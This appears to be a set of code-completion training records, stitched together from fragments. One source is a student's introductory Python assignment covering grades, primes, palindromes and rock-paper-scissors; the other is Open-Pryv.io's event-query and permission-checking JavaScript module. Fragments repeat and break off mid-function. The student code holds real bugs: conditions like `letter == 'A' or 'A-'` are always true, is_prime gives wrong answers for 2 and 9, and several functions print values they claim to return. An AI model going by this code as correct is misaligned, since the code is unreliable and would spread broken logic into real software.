if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
elif letter == 'A+':
print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
return reverse == string
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0
| letter2number | identifier_name |
a1_300068688.py.py | #Family name: Jared Amos
# Student number: 300068688
# Course: IT1 1120G
# Assignment Number 1
########################
# Question 1
########################
''' creates a function called repeat that takes 3 arguments, the fist argument is a string type and
and the second is a integer value 'n' and the third value is a string called 'delim' this function will
take the string add delim to the end of the string and repeat that 'n' amount times '''
def repeat(string, n, delim):
yoda = (string+delim)*n # creates a string 'yoda' and sets it equal to string+delim and repeats 'n' times
print(str(yoda)) #prints 'yoda'
########################
# Question 2
########################
''' creates a function called is_prime that takes one argument and check to see whether it is prime
or not, if it is a prime the function return true if not it returns else'''
def is_prime(n):
if n >= 2: # prime numbers are numbers that cant be divided unless its by 1 or it self so 'n' cannot be 1 or 2
for i in range(2, n): #creates a for loop that starts at 2 and ends at 'n'
if (n%i == 0): #checks to see whether n divides into i intergerally
return n<0 #if it does return false becuase n is not a prime number then
else:
return n>0 #returns true because n is a prime
########################
# Question 3
########################
''' Creates a function points that takes 4 arguments which make up to coordinates x1,y1 x2,y2
this function then computes the slope of the the line of these points and the distance between them
and outputs a message a message'''
def points(x1,y1,x2,y2):
distance = (((x2-x1)**2)+((y2-y1)**2))**(1/2) # finds the distance between these points by finding the hypotenuse of the triangle a^2 + b^2 = c^2
if (x2-x1)!= 0 and (y2-y1)!=0: #checks to see if the slope is not 0 and if it is print a special message
slope = (y2-y1)/(x2-x1) #computes slope
print("The slope is " + str(slope) + " and the distance is " + str(distance)) #prints out slope and distance
else:
print("the slope is infinity and the distance is " + str(distance))# slope is infinity so it outprints just the distance
########################
# Question 5
########################
''' creates a function reverse_int that takes one argument that is a integer and reverses
this integer'''
def reverse_int(num):
reverse1 = num%10 # gets you the number of the begining of the reversed integer
reverse2 = (num%100)-reverse1 # gets you the number of the second number in the reversed inetger
reverse1 = reverse1*100 # makes the number at the end now the begining
reverse3 = num//100 #gives you last number in the reversed integer
final = reverse1 + reverse2 + reverse3 # adds all the numbers together to get you the reversed int
return final #function returns the reversed int
########################
# Question 6
########################
''' creates a function vowelCount that takes one argument which is a string
and then prints out the number of vowels and what vowels are in the word'''
def vowelCount(string):
print('a, e, i, o, and u appear, respectively, ' + str(string.count('a'))+ ', ' + str(string.count('e'))+ ', ' + str(string.count('i')) + ', ' + str(string.count('o')) + ', ' + str(string.count('u'))+ ' times')
########################
# Question 7
########################
''' creayes a function with 3 input paramteres that are strings and checks to see if all the same
then returns true if they are and false if they are not'''
def allthesame(x,y,z):
if x==y and x==z and z==y: #if statment that checks whther they are all the sale
return x==y
else:
return 1<0
''' creates a function alldifferent that has 3 input paramteres that are all strings
and checks whether all the strings are different and returns true if they are and false
if they are not'''
def alldifferent(x,y,z):
if x != y and y != z and x != z: #checks to see whether the strings x, y and z are all different
return x!=y
else:
return 1<0
''' creates a function called sorted that takes 3 input paramteres and checks to see whether
they are in sorted order and returns true if they are and false if they are not'''
def sorted(x,y,z):
if z>y and z>x and y>x: #checks whther they are sorted
return z>y
else:
return 1<0
########################
# Question 8
########################
''' creates a function called leap that takes on input value that is an integer
, this function then computes whether that number was a leap year and
returns true if it was and false if it isnt'''
def leap(year):
if year%4==0 and year%100 != 0 or year%400==0: #checks whether the year was a leap year
return year>0
else:
return year<0
########################
# Question 9
########################
''' creates a function called letter2number tthat takes a string input that is a letter grade and converts them
to a number grade'''
def letter2number(letter):
if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
| print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
return reverse == string
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0 | elif letter == 'A+':
| random_line_split |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
|
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
// Resolves the module-level "mall" (events/streams store facade) once.
// Must complete before the middlewares that use `mall` run.
async function init() {
  mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
| identifier_body |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
| if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
